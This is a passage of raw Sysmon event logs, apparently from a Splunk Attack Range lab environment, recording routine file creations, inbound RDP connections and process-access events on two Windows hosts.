Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C4272077C5192C7AACFC450CCC7844F,SHA256=D354426C776200788792401D71215FB8738CF6653F9D17BCF327EF02C7AF27BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:32.691{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F454EDFCC555490F8E3C33C83B7865,SHA256=B0BDAF1C0544C9C92262F0C1FB2057AB4F5C8F366F0FBAB628A9ACC745662CD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:32.571{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3EDB02DC0049807E351BA221AFC5AB14,SHA256=9F048C295798D3DF448CAE6B0C3A8AFDD161D9E80AB244034C7CCE4ADD7DEF7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:33.977{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0D1A6524B0E0869A34C858D6DB0C898,SHA256=96F9E4D00C4109640CD7343CBD6148EFBF94EBA33339569BED38DBB29C6EEB87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:33.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A719E2CB9F8FE5A26C740F889077422,SHA256=15BAB23F5258D7AA1D2D86CC883F026A20036C3D111E0AFEF8BC2A0ABF47F049,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:30.397{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de63792-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:29.805{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59452-false10.0.1.12-8000- 23542300x8000000000000000980028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:33.024{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6ED407190EDC755ED216F5513EA49B8D,SHA256=A01AAF0B13DFE1FEE7EB5F27431DCA224BD0CF2234FA126C7456284897631E7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:30.936{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53463-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:34.704{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F467A9C9F1D66EE5CCF71F4905572315,SHA256=399E27950C7D2C9448E5197DCB8B93853A79A25D41B9469D1D24BD5708FB1AE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:35.925{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3944665E3A92DDBCA6CA7DCDBFB4B9,SHA256=A7503B0F8DBA2522B2E4C65EDC3FCB02686DA1C0100C5A5AF5A7102AE68BD6AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:35.212{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=216161F2C13C7D0979E4C429F936A74D,SHA256=CE629D6E452B3B9ACE3F11F01ECB19CA33BB3FE6494E636B7887DB7384ADB2A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:35.580{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CC37C9B6AF1FF944255C455E3C4A8D2,SHA256=5FE231B6C4FABCA74C33221B846887699658FA53CC48F4AEBE18A71945D29F2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:35.578{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23AD55F66AD28C567EA322A3C8803CCA,SHA256=0B4CDCC628327136056C5BBD67D425FA0269CEE24E961A89EF899EEEBCF64BC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.931{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67434BE8BA5222CB34C0E593F8BDDDF8,SHA256=A833C18185179A4088D7D7CDED1E9C5B930D2678928BF16FBB1554EFADD92DA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:36.915{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F92629E369D8A0F8DE3EC23A0C75CFDB,SHA256=FADD9FB7CC17F4486C7F22A1DDE4299596F88794E47F60AE0F58AA1082D4D545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:36.368{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340BA2BFA0AE1B17142ECD74A2C44C8B,SHA256=FA05111FCEF6FB39DEAC7E69D9BB2741E4D817691E3824B0A5B8A78B7EDC5029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.795{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=493F812F7329BA506F112D6CD475A321,SHA256=4E4A82187C40DA6C15A78049E333D29FC58EC54582F0CCBF20581C897AC96A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.794{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=C3FE65CBAF53008826C463116318E9A0,SHA256=ED69B27DB46FEEB14A44CCD89A7AE44E3CAF63AB05052F51CEBC788CEE800386,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.793{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=A5CFBEF72CCD415ED0A86BF90D17F871,SHA256=F50513C6D4A10C7AECF7AA2BFDADD9AF5E5C25550918EA9182AA77DF2AE79AF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.792{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=1F9BFBC276C04AA2C80AF0CF7E2459B8,SHA256=933CD7E120DEC711EA0FE0FEC6D3A9A131FEEC8F8C3847B614F750E8D5DD2764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.790{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=88ADB4E5B8ADA228FCB9EE3341F84369,SHA256=8DD80E7B080B6C54B34425C8B46324CFBC36F644227E80B60816F1D6BC5442B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.789{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\glean\db\data.safe.binMD5=E7F426C88FC99316875A57CB41428CCF,SHA256=F73B0397C55B1F1E981D03D6AAEDB7A57DE0A7D7971A47284EAF91D8937D388F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:36.766{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:34.195{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de59064-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001051608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:34.006{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63551-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001051618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:37.936{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=075F036C6A742274F79716FDE456B753,SHA256=CBC013FAF220A18301BFA4F7F8FB15A7D51E13AD96CF60166E06A4BDE09E0077,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C31-6151-F079-00000000FD01}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980044Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980043Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8C31-6151-F079-00000000FD01}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.462{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C31-6151-F079-00000000FD01}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.447{69CF5F33-8C31-6151-F079-00000000FD01}2276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:37.384{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 